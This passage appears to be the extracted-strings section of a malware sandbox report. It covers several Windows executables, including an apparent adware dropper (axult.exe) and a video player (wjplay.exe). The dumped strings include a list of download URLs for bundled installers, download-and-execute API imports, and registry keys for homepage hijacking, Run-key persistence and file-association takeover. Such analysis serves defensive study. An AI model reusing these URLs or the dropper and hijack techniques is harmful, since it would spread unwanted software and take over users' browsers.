not allowed on sorted list</pre><pre>Property %s does not exist</pre><pre>Ancestor for '%s' not found</pre><pre>Cannot assign a %s to a %s</pre><pre>Class %s not found%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates</pre><pre>Cannot create file %s</pre><pre>Cannot open file %s$''%s'' is not a valid component name</pre><pre>Invalid data type for '%s' List capacity out of bounds (%d)</pre><pre>External exception %x</pre><pre>Interface not supported</pre><pre>%s (%s, line %d)</pre><pre>Abstract Error?Access violation at address %p in module '%s'. %s of address %p</pre><pre>System Error. Code: %d.</pre><pre>Invalid pointer operation</pre><pre>Invalid class typecast0Access violation at address %p. %s of address %p</pre><pre>Privileged instruction%Exception %s in module %s at %p.</pre><pre>Application Error1Format '%s' invalid or incompatible with argument</pre><pre>No argument for format '%s'</pre><pre>Invalid variant operation"Variant method calls not supported</pre><pre>!'%s' is not a valid integer value</pre><pre>I/O error %d</pre><pre>Integer overflow Invalid floating point operation</pre><b>axult.exe_3272:</b><pre>.idata</pre><pre>.rdata</pre><pre>P.reloc</pre><pre>P.rsrc</pre><pre>kernel32.dll</pre><pre>$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)</pre><pre>u%CNu</pre><pre>Uh.UA</pre><pre>.Owner</pre><pre>jkudyi.bat</pre><pre>http://www.baidu.com/baidu?tn=flstudios_cb&word={searchTerms}&cl=3&ie=utf-8</pre><pre>SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\SHELL FOLDERS</pre><pre>Program Files\Internet Explorer\iexplore.exe"</pre><pre>SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command</pre><pre>setup_2949-14598.exe</pre><pre>http://download.grandcloud.cn/9291/15474/setup_2949-14598.exe</pre><pre>hzsoft\setup_2949-14598.exe</pre><pre>yuyuset_26_151422.exe</pre><pre>http://down.junshn.com/new/yuyuset_26_151422.exe</pre><pre>hzsoft\yuyuset_26_151422.exe</pre><pre>setup_qd304.exe</pre><pre>http://down.guangsu.cn/qdn/setup_qd304.exe</pre><pre>hzsoft\setup_qd304.exe</pre><pre>UUSEE_kb1003_Setup_133149.exe</pre><pre>http://download.uusee.com/pop1/kb1003/UUSEE_kb1003_Setup_133149.exe</pre><pre>hzsoft\UUSEE_kb1003_Setup_133149.exe</pre><pre>WanDouJiaSetup_zhimeng7_kb.exe</pre><pre>http://dl.wandoujia.com/files/third/WanDouJiaSetup_zhimeng7_kb.exe</pre><pre>hzsoft\WanDouJiaSetup_zhimeng7_kb.exe</pre><pre>wuzun-zm-157391-v6.exe</pre><pre>http://downloads.t3nlink.com/packages/g_wz/default2/wuzun-zm-157391-v6.exe</pre><pre>hzsoft\wuzun-zm-157391-v6.exe</pre><pre>wauee_jx036.exe</pre><pre>http://download.grandcloud.cn/9291/19525/wauee_jx036.exe</pre><pre>hzsoft\wauee_jx036.exe</pre><pre>NmnPps_1217.exe</pre><pre>http://down.u5c.net/NmnPps_1217.exe</pre><pre>hzsoft\NmnPps_1217.exe</pre><pre>yszj_zhimeng_160110.exe</pre><pre>http://download.grandcloud.cn/9291/19156/yszj_zhimeng_160110.exe</pre><pre>hzsoft\yszj_zhimeng_160110.exe</pre><pre>365weatherIns_202.exe</pre><pre>http://lm.beilequ.com/update/365/365weatherIns_202.exe</pre><pre>hzsoft\365weatherIns_202.exe</pre><pre>yuemar_x06.exe</pre><pre>http://down.yuemar.net:888/yuemar_x06.exe</pre><pre>hzsoft\yuemar_x06.exe</pre><pre>-8388_158017_xc.exe</pre><pre>http://download.grandcloud.cn/9291/20572/-8388_158017_xc.exe</pre><pre>hzsoft\-8388_158017_xc.exe</pre><pre>unersqa.exe</pre><pre>unotcvb.exe</pre><pre>IFoxInstall-y-c203945859-run-s-x.exe</pre><pre>setup_open_188.exe</pre><pre>setupX_054.exe</pre><pre>http://www.9365.info</pre><pre>user32.dll</pre><pre>GetKeyboardType</pre><pre>advapi32.dll</pre><pre>RegOpenKeyExA</pre><pre>RegCloseKey</pre><pre>oleaut32.dll</pre><pre>RegFlushKey</pre><pre>RegCreateKeyExA</pre><pre>WinExec</pre><pre>GetWindowsDirectoryA</pre><pre>GetCPInfo</pre><pre>URLMON.DLL</pre><pre>URLDownloadToFileA</pre><pre>?!?%?)?-?1?^?</pre><pre>KWindows</pre><pre>UrlMon</pre><pre>List index out of bounds (%d) Out of memory while expanding memory stream</pre><pre>Error reading %s%s%s: %s</pre><pre>Failed to get data for '%s'</pre><pre>Failed to set data for '%s'</pre><pre>%s.Seek not implemented$Operation not allowed on sorted list</pre><pre>Property %s does not exist</pre><pre>Ancestor for '%s' not found</pre><pre>Cannot assign a %s to a %s</pre><pre>Class %s not found%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates</pre><pre>Cannot create file %s</pre><pre>Cannot open file %s$''%s'' is not a valid component name</pre><pre>Invalid data type for '%s' List capacity out of bounds (%d)</pre><pre>List count out of bounds (%d)</pre><pre>External exception %x</pre><pre>Interface not supported</pre><pre>%s (%s, line %d)</pre><pre>Abstract Error?Access violation at address %p in module '%s'. %s of address %p</pre><pre>System Error. Code: %d.</pre><pre>Invalid pointer operation</pre><pre>Invalid class typecast0Access violation at address %p. %s of address %p</pre><pre>Privileged instruction%Exception %s in module %s at %p.</pre><pre>Application Error1Format '%s' invalid or incompatible with argument</pre><pre>No argument for format '%s'</pre><pre>Invalid variant operation"Variant method calls not supported</pre><pre>!'%s' is not a valid integer value</pre><pre>I/O error %d</pre><pre>Integer overflow Invalid floating point operation</pre><b>setup_qd304.exe_404:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.ndata</pre><pre>.rsrc</pre><pre>uDSSh</pre><pre>.DEFAULT\Control Panel\International</pre><pre>Software\Microsoft\Windows\CurrentVersion</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>ExitWindowsEx</pre><pre>USER32.dll</pre><pre>GDI32.dll</pre><pre>SHFileOperationA</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>RegEnumKeyA</pre><pre>RegCreateKeyExA</pre><pre>RegCloseKey</pre><pre>RegDeleteKeyA</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>COMCTL32.dll</pre><pre>ole32.dll</pre><pre>VERSION.dll</pre><pre>verifying installer: %d%%</pre><pre>unpacking data: %d%%</pre><pre>... %d%%</pre><pre>http://nsis.sf.net/NSIS_Error</pre><pre>~nsu.tmp</pre><pre>%u.%u%s%s</pre><pre>RegDeleteKeyExA</pre><pre>%s=%s</pre><pre>*?|<>/":</pre><pre>\LOCALS~1\Temp\nsw3.tmp\metadl.dll</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw3.tmp\metadl.dll</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw3.tmp</pre><pre>System.dll</pre><pre>callback%d</pre><pre>; ;$;(;,;0;4;8;<;@;</pre><pre>> >$>(>,></pre><pre>:$;(;,;0;4;8;<;@;</pre><pre>.reloc</pre><pre>/build/buildd/mingw32-3.4.5.20060117.1.dfsg/build_dir/src/gcc-3.4.5-20060117-1-dfsg/gcc/config/i386/w32-shared-ptr.c</pre><pre>exports.o.dll</pre><pre>metadl.dll</pre><pre>PeekNamedPipe</pre><pre>msvcrt.dll</pre><pre>WSOCK32.DLL</pre><pre>6o6c7}7</pre><pre>20979>9.?</pre><pre>=&=>=]=|=</pre><pre>nsw3.tmp</pre><pre>\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw3.tmp</pre><pre>setup_qd304.gif</pre><pre>setup_qd304.exe</pre><pre>"%Program Files%\vsgrtaho\hzsoft\setup_qd304.exe"</pre><pre>%Program Files%\gssoft\gswb</pre><pre>%Program Files%\vsgrtaho\hzsoft</pre><pre>CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsb1.tmp</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\</pre><pre>%Program Files%\vsgrtaho\hzsoft\setup_qd304.exe</pre><pre><?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32" /><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false" /></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" /><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" /></application></compatibility></assembly></pre><pre>2.7.1.32</pre><pre>http://www.guangsu.cn/</pre><pre>2.7.1.3126</pre><b>setup_qd304.exe_404_rwx_10004000_00001000:</b><pre>callback%d</pre><b>IFoxInstall-y-c203945859-run-s-x.exe_1472:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>@.reloc</pre><pre>8%uEP3</pre><pre>tGHt.Ht&</pre><pre>kernel32.dll</pre><pre>Please contact the application's support team for more information.</pre><pre>- Attempt to initialize the CRT more than once.</pre><pre>- CRT not initialized</pre><pre>- floating point support not loaded</pre><pre>operator</pre><pre>GetProcessWindowStation</pre><pre>USER32.DLL</pre><pre>127.0.0.1</pre><pre>RegDeleteKeyExW</pre><pre>e:\work\code\sohu\trunk-new\bin\release-static\IFoxOnlineInstall.pdb</pre><pre>VERSION.dll</pre><pre>KERNEL32.dll</pre><pre>GetKeyState</pre><pre>SetWindowsHookExW</pre><pre>UnhookWindowsHookEx</pre><pre>USER32.dll</pre><pre>SetViewportOrgEx</pre><pre>GDI32.dll</pre><pre>RegOpenKeyW</pre><pre>RegCloseKey</pre><pre>RegOpenKeyExW</pre><pre>RegDeleteKeyW</pre><pre>RegQueryInfoKeyW</pre><pre>RegEnumKeyExW</pre><pre>RegCreateKeyExW</pre><pre>ADVAPI32.dll</pre><pre>ShellExecuteW</pre><pre>SHELL32.dll</pre><pre>ole32.dll</pre><pre>OLEAUT32.dll</pre><pre>SHLWAPI.dll</pre><pre>HttpOpenRequestW</pre><pre>HttpAddRequestHeadersW</pre><pre>HttpSendRequestW</pre><pre>HttpQueryInfoW</pre><pre>InternetOpenUrlW</pre><pre>WININET.dll</pre><pre>WS2_32.dll</pre><pre>IPHLPAPI.DLL</pre><pre>GdiplusShutdown</pre><pre>gdiplus.dll</pre><pre>IMM32.dll</pre><pre>COMCTL32.dll</pre><pre>GetProcessHeap</pre><pre>GetCPInfo</pre><pre>GetConsoleOutputCP</pre><pre>.?AVCSHKeySignalArgs@shui@@</pre><pre>zcÁ</pre><pre>09/13/10</pre><pre>"iTXtXML:com.adobe.xmp</pre><pre>" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Macintosh" xmpMM:InstanceID="xmp.iid:547C02C673D911E0983BE89B6357981F" xmpMM:DocumentID="xmp.did:547C02C773D911E0983BE89B6357981F"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:04FD7EE773D711E0983BE89B6357981F" stRef:documentID="xmp.did:04FD7EE873D711E0983BE89B6357981F" /> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?></pre><pre>" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Macintosh" xmpMM:InstanceID="xmp.iid:547C02CA73D911E0983BE89B6357981F" xmpMM:DocumentID="xmp.did:547C02CB73D911E0983BE89B6357981F"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:547C02C873D911E0983BE89B6357981F" stRef:documentID="xmp.did:547C02C973D911E0983BE89B6357981F" /> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>>@</pre><pre>" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Macintosh" xmpMM:InstanceID="xmp.iid:04FD7EE573D711E0983BE89B6357981F" xmpMM:DocumentID="xmp.did:04FD7EE673D711E0983BE89B6357981F"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:04FD7EE373D711E0983BE89B6357981F" stRef:documentID="xmp.did:04FD7EE473D711E0983BE89B6357981F" /> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?></pre><pre>,^T)UF%UF9AL9J@</pre><pre>M.FL6AJ</pre><pre>=<40:24648</pre><pre>1DW%X</pre><pre><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="XP style manifest" processorArchitecture="x86" version="1.0.0.0" type="win32"></assemblyIdentity><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo></assembly>PA<?xml version="1.0" encoding="UTF-8" standalone="yes"?></pre><pre>version="1.0.0.0"</pre><pre>name="Microsoft.Windows.Common-Controls"</pre><pre>version="6.0.0.0"</pre><pre>publicKeyToken="6595b64144ccf1df"</pre><pre>2=3Q3</pre><pre>747;7Â8</pre><pre>1.24282<2@2</pre><pre>< <(<0<8<</pre><pre>4 4$4(4,4</pre><pre>? ?$?(?,?0?4?8?<?</pre><pre>KERNEL32.DLL</pre><pre>mscoree.dll</pre><pre>windows</pre><pre>http://tv.sohu.com/upload/hdfeedback/index.jsp?p2p</pre><pre>http://p2p.hd.sohu.com/dcs.do?n=offline&f=1</pre><pre>\SHOnlineInstall.ini</pre><pre>http://photocdn.hd.sohu.com/upgrade/IFoxInfo_%s.cfg</pre><pre>http://photocdn.hd.sohu.com/upgrade/IFoxInfo.cfg</pre><pre>cfgUrl</pre><pre>\IFoxInfo.ini</pre><pre>\SoHuVA_Install.exe</pre><pre>%Program Files%\</pre><pre>/SP- /VERYSILENT /SUPPRESSMSGBOXES /NOICONS /NORESTART "%s"</pre><pre>xxxxxxxxxxxxxxxx</pre><pre>HTTP/1.1</pre><pre>1C49D6C1-DF17-4c22-8F76-0223272B35DA</pre><pre>http://p2p.hd.sohu.com.cn/dcs.do?type=download&error=%d&v=%s&ChannelID=%d&last_error=%d&local=%d&referID=%s</pre><pre>&dif_time=%d&download_speed=%.2f</pre><pre>http://p2p.hd.sohu.com.cn/dcs.do?type=install</pre><pre>&error=%d&v=%s&ChannelID=%d&last_error=%d&referID=%s</pre><pre>&reinstall=%d</pre><pre>%d.%d.%d.%d</pre><pre>\SHVersion.dll</pre><pre>\sohu.cfg</pre><pre>&uid=%d</pre><pre>&LocalIp=%s</pre><pre>&MashCode=%s</pre><pre>&ChannelID=%d</pre><pre>&v=%s</pre><pre>×tamp=%d</pre><pre>&btea=%s</pre><pre>@HKEY_CURRENT_CONFIG</pre><pre>HKEY_DYN_DATA</pre><pre>HKEY_PERFORMANCE_DATA</pre><pre>HKEY_USERS</pre><pre>HKEY_LOCAL_MACHINE</pre><pre>HKEY_CURRENT_USER</pre><pre>HKEY_CLASSES_ROOT</pre><pre>AAdvapi32.dll</pre><pre>WTL_CmdBar_InternalAutoPopupMsg</pre><pre>WTL_CmdBar_InternalGetBarMsg</pre><pre>uxtheme.dll</pre><pre>comctl32.dll</pre><pre>@d:d</pre><pre>%Program Files%\vsgrtaho\hzsoft\IFoxInstall-y-c203945859-run-s-x.exe</pre><pre>%Program Files%\vsgrtaho\hzsoft</pre><pre>IFoxInstall-y-c203945859-run-s-x.exe</pre><pre>windows 98/2000/2003/xp/vista/win7</pre><pre><a href="tv.sohu.com"></a></pre><pre>SHOnlineInstall.exe</pre><b>wjplay.exe_3964:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>@.reloc</pre><pre>xSSSh</pre><pre>FTPjKS</pre><pre>FtPj;S</pre><pre>C.PjRV</pre><pre>Visual C CRT: Not enough memory to complete call to strerror.</pre><pre>portuguese-brazilian</pre><pre>Broken pipe</pre><pre>Inappropriate I/O control operation</pre><pre>Operation not permitted</pre><pre>operator</pre><pre>GetProcessWindowStation</pre><pre>http://update.wuji.com/</pre><pre>\SysConfig.ini</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>"%s" -mini</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><pre>WJNews.exe</pre><pre>"%s%s" -mini</pre><pre>http://wj.wuji.com/</pre><pre><4,$?7/'</pre><pre>(3-!0,1'8"5.*2$</pre><pre>morewin.xml</pre><pre>AdWebBrowser</pre><pre>adwin.xml</pre><pre>FBWebBrowser</pre><pre>feedback.xml</pre><pre>web_feedback</pre><pre><i arrow_2></i></pre><pre><i arrow_1></i></pre><pre>locallist.xml</pre><pre>list_item.xml</pre><pre><i play></i></pre><pre>operation</pre><pre>{i menu_6.png}</pre><pre>popmenu.xml</pre><pre>btn_%s</pre><pre>file='menuitem.png' source='0,0,120,30'</pre><pre>{i i_youku.png}</pre><pre>{i i_tudou.png}</pre><pre>{i i_sohu.png}</pre><pre>{i i_qiyi.png}</pre><pre>{i i_pptv.png} PPTV</pre><pre>{i i_leshi.png}</pre><pre>{i i_pps.png} PPS</pre><pre>{i i_qq.png}</pre><pre>{i i_wasu.png}</pre><pre>file='menuitem.png' source='0,30,120,60'</pre><pre>PopSrc.xml</pre><pre>poptip.xml</pre><pre>http://www.hao123.com/?tn=97514469_hao_pg</pre><pre>xml/bottom.xml</pre><pre>%ProgramFiles%\Internet Explorer\iexplore.exe</pre><pre>%s\%s</pre><pre>CheckUpdate.xml</pre><pre>PlayerUpdate.exe</pre><pre>http://tj.wuji.com/</pre><pre>feedback/b.html</pre><pre>playlist.xml</pre><pre>EkanWebBrowser</pre><pre>homewin.xml</pre><pre>Data/user2.ini</pre><pre>%s?%s</pre><pre>a.ashx</pre><pre>00:00:00:00:00:00</pre><pre>%d-%d-%d %d:%d:%d</pre><pre>X:X:X:X:X:X</pre><pre>//./%s</pre><pre>client.ini</pre><pre>2000-01-01</pre><pre>Software\Microsoft\Windows NT\CurrentVersion</pre><pre>http://download.wuji.com/</pre><pre>pu.exe</pre><pre>%d-%d-%d</pre><pre>%d-d-d</pre><pre>SysConfig.ini</pre><pre>%s\360se\360se.ini</pre><pre>%s\SogouExplorer\config.xml</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\TheWorld.exe</pre><pre>\TheWorld.ini</pre><pre>AppUpdate/PlayerUpdate.zip</pre><pre>AppUpdate/WJNews.zip</pre><pre>apnews.exe</pre><pre>AppUpdate/apnews.zip</pre><pre>server.ini</pre><pre>appupdate/ver.ini</pre><pre>WujiPlayer.%s</pre><pre>Data\wj.ico,0</pre><pre>%s\DefaultIcon</pre><pre>%s\Shell</pre><pre>%s\Shell\Open</pre><pre>%s\Shell\Open\Command</pre><pre>"%s" "%%1"</pre><pre>Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\%s\UserChoice</pre><pre>Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\%s</pre><pre>http://update.wuji.com/tj.ashx</pre><pre>http://www.hao123.com/?tn=39005018_672_hao_pg</pre><pre>http://update.wuji.com/goUrl.html?</pre><pre>data\tab_more.png</pre><pre>tab/tab_more.png</pre><pre>tab/url.txt</pre><pre>PlayWebBrowser</pre><pre>mainwin.xml</pre><pre>http://www.wuji.com</pre><pre>tab_web</pre><pre>file='%sData\tab_more.png' source='0,0,100,40'</pre><pre>file='%sData\tab_more.png' source='0,40,100,80'</pre><pre>file='%sData\tab_more.png' source='0,80,100,120'</pre><pre>xoxo/liebiao.html</pre><pre>Data/Def.html</pre><pre>txt_url</pre><pre>file='bgtab1.png' corner='746,96,1,1'</pre><pre>file='bgtab2.png' corner='746,96,1,1'</pre><pre>tab_weblist</pre><pre>%splay.html?vodinfo=%s_%s_1</pre><pre>play.html?vodinfo=</pre><pre>%s_%s_%s</pre><pre>%s_%s_%d</pre><pre>%splay.html?vodinfo=%s</pre><pre>\ch.ini</pre><pre>sysConfig.xml</pre><pre>tab_hotkey</pre><pre>AppUpdate/getver.html</pre><pre>AppUpdate/IsUpdate.html</pre><pre>AppUpdate/Done.html</pre><pre>AppUpdate/Error.html</pre><pre>split.xml</pre><pre>WebToolBar</pre><pre>ToolBar.xml</pre><pre>close.xml</pre><pre>E:\CPP\[2012-9]</pre><pre>\WujiSimple\bin\wjplay.pdb</pre><pre>WinExec</pre><pre>KERNEL32.dll</pre><pre>RegisterHotKey</pre><pre>UnregisterHotKey</pre><pre>USER32.dll</pre><pre>RegOpenKeyExA</pre><pre>RegOpenKeyA</pre><pre>RegCloseKey</pre><pre>RegCreateKeyA</pre><pre>RegCreateKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>ole32.dll</pre><pre>?NavigateUrl@CWebBrowserUI@DuiLib@@QAEXPBD@Z</pre><pre>?OnKeyDown@WindowImplBase@DuiLib@@UAEJIIJAAH@Z</pre><pre>?GetMessageMap@WindowImplBase@DuiLib@@MBEPBUDUI_MSGMAP@2@XZ</pre><pre>?NavigateHomePage@CWebBrowserUI@DuiLib@@QAEXXZ</pre><pre>?SetAutoNavigation@CWebBrowserUI@DuiLib@@QAEX_N@Z</pre><pre>?SetHomePage@CWebBrowserUI@DuiLib@@QAEXPBD@Z</pre><pre>?Navigate2@CWebBrowserUI@DuiLib@@QAEXPBD@Z</pre><pre>?SetKeyboardEnabled@CControlUI@DuiLib@@UAEX_N@Z</pre><pre>?IsKeyboardEnabled@CControlUI@DuiLib@@UBE_NXZ</pre><pre>?Download@CWebBrowserUI@DuiLib@@UAGJPAUIMoniker@@PAUIBindCtx@@KJPAU_tagBINDINFO@@PB_W3I@Z</pre><pre>?Exec@CWebBrowserUI@DuiLib@@UAGJPBU_GUID@@KKPAUtagVARIANT@@1@Z</pre><pre>?QueryStatus@CWebBrowserUI@DuiLib@@UAGJPBU_GUID@@KQAU_tagOLECMD@@PAU_tagOLECMDTEXT@@@Z</pre><pre>?QueryService@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@0PAPAX@Z</pre><pre>?FilterDataObject@CWebBrowserUI@DuiLib@@UAGJPAUIDataObject@@PAPAU3@@Z</pre><pre>?TranslateUrl@CWebBrowserUI@DuiLib@@UAGJKPA_WPAPA_W@Z</pre><pre>?GetExternal@CWebBrowserUI@DuiLib@@UAGJPAPAUIDispatch@@@Z</pre><pre>?GetDropTarget@CWebBrowserUI@DuiLib@@UAGJPAUIDropTarget@@PAPAU3@@Z</pre><pre>?GetOptionKeyPath@CWebBrowserUI@DuiLib@@UAGJPAPA_WK@Z</pre><pre>?TranslateAcceleratorA@CWebBrowserUI@DuiLib@@UAGJPAUtagMSG@@PBU_GUID@@K@Z</pre><pre>?TranslateAcceleratorA@CWebBrowserUI@DuiLib@@UAEJPAUtagMSG@@@Z</pre><pre>?ResizeBorder@CWebBrowserUI@DuiLib@@UAGJPBUtagRECT@@PAUIOleInPlaceUIWindow@@H@Z</pre><pre>?OnFrameWindowActivate@CWebBrowserUI@DuiLib@@UAGJH@Z</pre><pre>?OnDocWindowActivate@CWebBrowserUI@DuiLib@@UAGJH@Z</pre><pre>?EnableModeless@CWebBrowserUI@DuiLib@@UAGJH@Z</pre><pre>?UpdateUI@CWebBrowserUI@DuiLib@@UAGJXZ</pre><pre>?HideUI@CWebBrowserUI@DuiLib@@UAGJXZ</pre><pre>?ShowUI@CWebBrowserUI@DuiLib@@UAGJKPAUIOleInPlaceActiveObject@@PAUIOleCommandTarget@@PAUIOleInPlaceFrame@@PAUIOleInPlaceUIWindow@@@Z</pre><pre>?GetHostInfo@CWebBrowserUI@DuiLib@@UAGJPAU_DOCHOSTUIINFO@@@Z</pre><pre>?ShowContextMenu@CWebBrowserUI@DuiLib@@UAGJKPAUtagPOINT@@PAUIUnknown@@PAUIDispatch@@@Z</pre><pre>?GetIDsOfNames@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@PAPA_WIKPAJ@Z</pre><pre>?GetTypeInfo@CWebBrowserUI@DuiLib@@UAGJIKPAPAUITypeInfo@@@Z</pre><pre>?GetTypeInfoCount@CWebBrowserUI@DuiLib@@UAGJPAI@Z</pre><pre>?QueryInterface@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@PAPAX@Z</pre><pre>?Release@CWebBrowserUI@DuiLib@@UAGKXZ</pre><pre>?AddRef@CWebBrowserUI@DuiLib@@UAGKXZ</pre><pre>?GetInterface@CWebBrowserUI@DuiLib@@UAEPAXPBD@Z</pre><pre>?GetClass@CWebBrowserUI@DuiLib@@UBEPBDXZ</pre><pre>?CommandStateChange@CWebBrowserUI@DuiLib@@IAEXJF@Z</pre><pre>?NewWindow3@CWebBrowserUI@DuiLib@@IAEXPAPAUIDispatch@@AAPAFKPA_W2@Z</pre><pre>?NavigateComplete2@CWebBrowserUI@DuiLib@@IAEXPAUIDispatch@@AAPAUtagVARIANT@@@Z</pre><pre>?NavigateError@CWebBrowserUI@DuiLib@@IAEXPAUIDispatch@@AAPAUtagVARIANT@@11AAPAF@Z</pre><pre>?BeforeNavigate2@CWebBrowserUI@DuiLib@@IAEXPAUIDispatch@@AAPAUtagVARIANT@@1111AAPAF@Z</pre><pre>?SetAttribute@CWebBrowserUI@DuiLib@@MAEXPBD0@Z</pre><pre>?ReleaseControl@CWebBrowserUI@DuiLib@@MAEXXZ</pre><pre>?DoCreateControl@CWebBrowserUI@DuiLib@@UAE_NXZ</pre><pre>??1CWebBrowserUI@DuiLib@@UAE@XZ</pre><pre>??0CWebBrowserUI@DuiLib@@QAE@XZ</pre><pre>?Invoke@CWebBrowserUI@DuiLib@@UAGJJABU_GUID@@KGPAUtagDISPPARAMS@@PAUtagVARIANT@@PAUtagEXCEPINFO@@PAI@Z</pre><pre>?SetWebBrowserEventHandler@CWebBrowserUI@DuiLib@@QAEXPAVCWebBrowserEventHandler@2@@Z</pre><pre>?Refresh@CWebBrowserUI@DuiLib@@QAEXXZ</pre><pre>DuiLib.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>PSAPI.DLL</pre><pre>IPHLPAPI.DLL</pre><pre>NETAPI32.dll</pre><pre>GetCPInfo</pre><pre>GetProcessHeap</pre><pre>OLEAUT32.dll</pre><pre>zcÁ</pre><pre>.?AVAdWebEventListener@@</pre><pre>.?AVCWebBrowserUI@DuiLib@@</pre><pre>.?AVAdWebBrowser@@</pre><pre>.?AVFBWebBrowser@@</pre><pre>.?AVFBWebCall@@</pre><pre>.?AVPlayWebBrowser@@</pre><pre>.?AVCWebBrowserEventHandler@DuiLib@@</pre><pre>.?AV?$TTimer@VEkanWebEvent@@@@</pre><pre>.?AVEkanWebEvent@@</pre><pre>.?AVEkanWebBrowser@@</pre><pre>.?AVEKanWebCall@@</pre><pre>.?AVWebToolBar@@</pre><pre>%Program Files%\wjplay2\20140503022256\wjplay.exe</pre><pre><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></pre><pre>6$666?6\6</pre><pre>7 7$7(7=8</pre><pre>8Â8S8w8</pre><pre>; ;$;(;,;0;4;8;<;@;</pre><pre>>$?@?`?|?</pre><pre>mscoree.dll</pre><pre>nKERNEL32.DLL</pre><pre>- Attempt to initialize the CRT more than once.</pre><pre>- CRT not initialized</pre><pre>- floating point support not 